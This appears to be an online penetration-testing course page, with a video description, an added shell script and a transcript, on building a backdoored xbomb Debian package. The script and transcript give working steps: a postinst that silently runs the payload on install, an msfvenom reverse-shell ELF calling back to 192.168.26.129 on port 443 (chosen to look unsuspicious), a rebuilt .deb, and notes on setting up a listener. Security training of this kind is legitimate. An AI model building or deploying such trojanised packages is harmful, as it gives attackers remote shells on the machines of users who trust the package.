Part 2 - Generating the Payload



Time
5 hours 38 minutes
Difficulty
Intermediate
Video Description

The reverse shell exploit begins with generating the malicious payload. Several temporary directories need to be created on the pentesting client to hold the unpacked files of the xbomb game, the post-installation files, and the modified package containing the payload. We use the Metasploit msfvenom tool to generate the payload. One of its advantages is that you don't need to be inside the Metasploit framework: it can be run directly from the Linux command line.
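The following script is an added example, not the course's own code: it reproduces the Part 2 workflow end to end (unpack the original package with dpkg-deb, add the DEBIAN control area, copy in control and postinst, make postinst executable, run msfvenom for the reverse-shell ELF, then rebuild the .deb). It assumes a base directory of /root/backdoor, the original package at /root/backdoor/xbomb.deb, the control file from Part 1 at /root/backdoor/control, an attacker address of 192.168.26.129, the payload file name xbomb_scores, and the contents of postinst, which the page never shows; the postinst body here is this example's own assumption.

```shell
#!/bin/sh
# Added example (not the course's script): stage a backdoored xbomb package.
# Assumed: base dir /root/backdoor, original xbomb.deb, Part 1 control file,
# LHOST 192.168.26.129, payload name xbomb_scores, and the postinst body.
set -eu

# Assumed postinst contents (the page only says it is copied and chmod'ed):
# on "configure" start the staged payload detached from the install, then
# exit 0 so dpkg reports the install as successful.
write_postinst() {
    out="$1"; payload_abs="$2"
    cat > "$out" <<EOF
#!/bin/sh
# postinst: assumed contents for this example
if [ "\$1" = "configure" ]; then
    nohup $payload_abs >/dev/null 2>&1 &
fi
exit 0
EOF
}

# Unpack the original package's file tree into WORKDIR and add DEBIAN/.
# dpkg-deb --extract writes only the file tree (no DEBIAN/), which is why
# control and postinst have to be copied in by hand. If the .deb is absent
# (offline run) only the directory skeleton is created.
stage_package() {
    deb="$1"; workdir="$2"; control="$3"; postinst="$4"
    if [ -f "$deb" ]; then
        dpkg-deb --extract "$deb" "$workdir"
    else
        echo "warning: $deb not found, creating empty skeleton" >&2
        mkdir -p "$workdir/usr/games"
    fi
    mkdir -p "$workdir/DEBIAN"
    cp "$control" "$workdir/DEBIAN/control"
    cp "$postinst" "$workdir/DEBIAN/postinst"
    # dpkg-deb --build rejects maintainer scripts that are not executable
    chmod 755 "$workdir/DEBIAN/postinst"
}

# The msfvenom command from the video: x64 Linux, shell_reverse_tcp,
# null byte excluded, ELF output written straight into the work tree.
msfvenom_cmd() {
    lhost="$1"; lport="$2"; outfile="$3"
    printf 'msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=%s LPORT=%s -b "\\x00" -f elf -o %s' \
        "$lhost" "$lport" "$outfile"
}

# Run msfvenom and make the resulting ELF executable in the package tree.
generate_payload() {
    lhost="$1"; lport="$2"; outfile="$3"
    cmd=$(msfvenom_cmd "$lhost" "$lport" "$outfile")
    echo "+ $cmd" >&2
    eval "$cmd"
    chmod 755 "$outfile"
}

# Rebuild the modified package from the work tree.
build_package() {
    workdir="$1"; out_deb="$2"
    dpkg-deb --build "$workdir" "$out_deb"
}

# Usage: sh build_backdoor.sh run   (assumed paths below)
if [ "${1:-}" = "run" ]; then
    BASE=/root/backdoor
    WORKDIR="$BASE/workdir"
    write_postinst "$BASE/postinst" /usr/games/xbomb_scores
    stage_package "$BASE/xbomb.deb" "$WORKDIR" "$BASE/control" "$BASE/postinst"
    generate_payload 192.168.26.129 443 "$WORKDIR/usr/games/xbomb_scores"
    build_package "$WORKDIR" "$BASE/xbomb_backdoored.deb"
fi
```

Two practitioner notes. A reverse shell only lands if something is listening on LHOST:LPORT before the victim installs the package (for example msfconsole's exploit/multi/handler set to linux/x64/shell_reverse_tcp, or a plain netcat listener on 443). And excluding \x00 with -b makes msfvenom run the payload through an encoder; an ELF written to disk is not parsed as a C string, so the option is not required for this format, though it does no harm.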

Video Transcription
00:04
All right. So now what we need to do is move the
00:09
xbomb file to this folder.
00:12
Uh,
00:14
I'm also going to create
00:20
a work directory
00:23
when I extract the package itself. So I need to run
00:27
dpkg
00:29
--extract,
00:31
and I'm using tab complete there. I know there's a file that starts with x, so I just type x and hit the Tab key.
00:40
And then I'm going to go ahead and call this
00:45
xbomb.
00:49
Actually, I'll call it workdir, so it doesn't get too confusing.
00:54
So you'll notice I have a work directory created here.
00:58
And if I look inside there, I've got the file structure that the package requires,
01:04
What I'm also going to do is make a directory
01:07
called DEBIAN
01:10
underneath workdir,
01:14
and now I'm gonna copy the control and post install files
01:19
to this Debian subdirectory
01:32
Oops.
01:41
All right, well, it helps if I spell the actual file name correctly. Little mistake there.
01:46
So first we're gonna copy the control file,
01:49
and
01:51
then we're going to copy
01:53
postinst.
01:56
Now they're both in the proper place,
01:59
and we can go to that directory real quick,
02:05
and I need to make the post-installation file executable. So I'm going to do a chmod on that.
02:10
Now I can see that it's executable. And of course, it changes color in my bash shell to show that that happened.
02:21
Now that I've got those things in place,
02:23
I can use the msfvenom
02:28
tool, and this is part of Metasploit. It replaces the previous msfpayload and
02:37
other commands that you could use from a command line to bundle together
02:40
information to create a payload, or create a file, without having to be in the msfconsole
02:47
or in the Metasploit framework directly, so I can just use it from the command line.
02:53
And so what I need to do... I've got this in my command history, so I'm going to go ahead and find it.
03:02
Where
03:04
is msfvenom? There it is.
03:07
All right, so let's review this command real quick. It looks like it's got a lot of stuff, and it does
03:13
So the architecture is x64.
03:17
That's x86-64 architecture,
03:21
and I tell it my platform is Linux, and I'm now specifying the payload,
03:27
and the payload is Linux 64-bit shell reverse TCP.
03:32
I do need to change my IP address,
03:38
so I'm going to go ahead and
03:42
do that here. It was 26.129, I believe.
03:46
Open up a new tab and double-check myself.
03:50
Yep, it's 192.168.26.129.
03:55
Okay,
03:57
I'm also going to
03:59
specify that my local port is 443,
04:02
so that when
04:04
the victim connects to my website, it won't look like a suspicious connection at all. 443 is a normal port to see connected to websites.
04:15
I'm also specifying a bad character
04:17
of hex 00 to exclude from this payload generation.
04:24
Ah, that's needed for
04:26
better compatibility with this particular architecture.
04:30
I'm also specifying the output format, which is ELF,
04:34
and then my output file.
04:38
I know it's underneath /root/backdoor/workdir/usr/games/xbomb_scores. So this
04:45
payload becomes part of the package,
04:47
and then again, when the victim installs it, the
04:51
capability for the reverse shell should be activated.
04:54
So we'll go ahead and run the command.
04:58
It takes a moment